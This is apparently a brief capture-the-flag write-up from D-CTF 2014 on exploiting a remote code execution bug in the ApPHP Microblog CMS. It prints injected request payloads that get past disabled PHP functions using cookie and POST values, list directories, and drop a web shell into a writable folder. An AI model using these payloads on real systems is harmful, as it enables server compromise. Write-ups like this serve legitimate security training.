Posted on by and filed under D-CTF 2014.

For this challenge, we were presented with a website made from the ApPHP Microblog CMS. A quick search on Exploit-DB revealed that there was an existing RCE bug.
PHP disable_functions seemed to have an extensive list since exec, shell_exec, and system were all disabled. This leaves only a few commands left to use. It was also discovered that there was character escaping taking place for the usual suspects. This left methods of controlled variables to pass the strings that we wanted. Using $_COOKIE and $_POST could pass two strings to functions like scandir() and get_file_contents() using implode() to bring the array together.
GET index.php HTTP/1.1

GET Request: ?asdf);print_r(scandir(implode($_COOKIE))=/
Cookie: 0=include
After investigating the [include] directory, it was discovered that it was world writable. This allowed a shell to get dropped like r57 or similar.;file_put_contents(implode($_POST),file_get_contents(implode($_COOKIE))=/
Post Request: 0=include/myfile.php
Cookie: 0=
This placed a shell on the server that we could access. From there, just traverse down to the root of the drive (/) and find the [./flag] executable and run that from the planted shell to get the flag to turn in.